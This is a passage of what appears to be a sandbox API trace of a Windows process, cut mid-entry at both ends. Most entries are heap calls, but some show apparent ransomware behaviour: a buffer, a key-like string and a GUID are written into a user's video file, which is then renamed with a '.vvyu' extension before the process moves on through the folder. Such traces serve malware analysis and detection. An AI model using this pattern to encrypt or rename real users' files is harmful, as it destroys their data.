(HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a270 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2d0 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0196.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2e8 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a288 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a258 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2bd82f0 [0196.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0196.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bd82f0 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ce00 | out: hHeap=0x6a0000) returned 1 [0196.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.259] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x10a40, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x10a40, lpOverlapped=0x0) returned 1 [0196.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.260] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x10a45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.260] WriteFile (in: hFile=0x52c, lpBuffer=0x74ad40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x74ad40*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.262] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.262] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.262] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.262] CloseHandle (hObject=0x52c) returned 1 [0196.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0196.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0196.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.265] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\MSPqrTgqm.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\mspqrtgqm.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\MSPqrTgqm.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\mspqrtgqm.swf.vvyu")) returned 1 [0196.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.267] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.270] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65501dc0, ftCreationTime.dwHighDateTime=0x1d8a065, ftLastAccessTime.dwLowDateTime=0x5e385880, ftLastAccessTime.dwHighDateTime=0x1d8a3c7, ftLastWriteTime.dwLowDateTime=0x5e385880, ftLastWriteTime.dwHighDateTime=0x1d8a3c7, nFileSizeHigh=0x0, nFileSizeLow=0x10a45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPqrTgqm.swf", cAlternateFileName="MSPQRT~1.SWF")) returned 0 [0196.270] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.271] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0196.271] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0196.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0196.292] RtlAllocateHeap 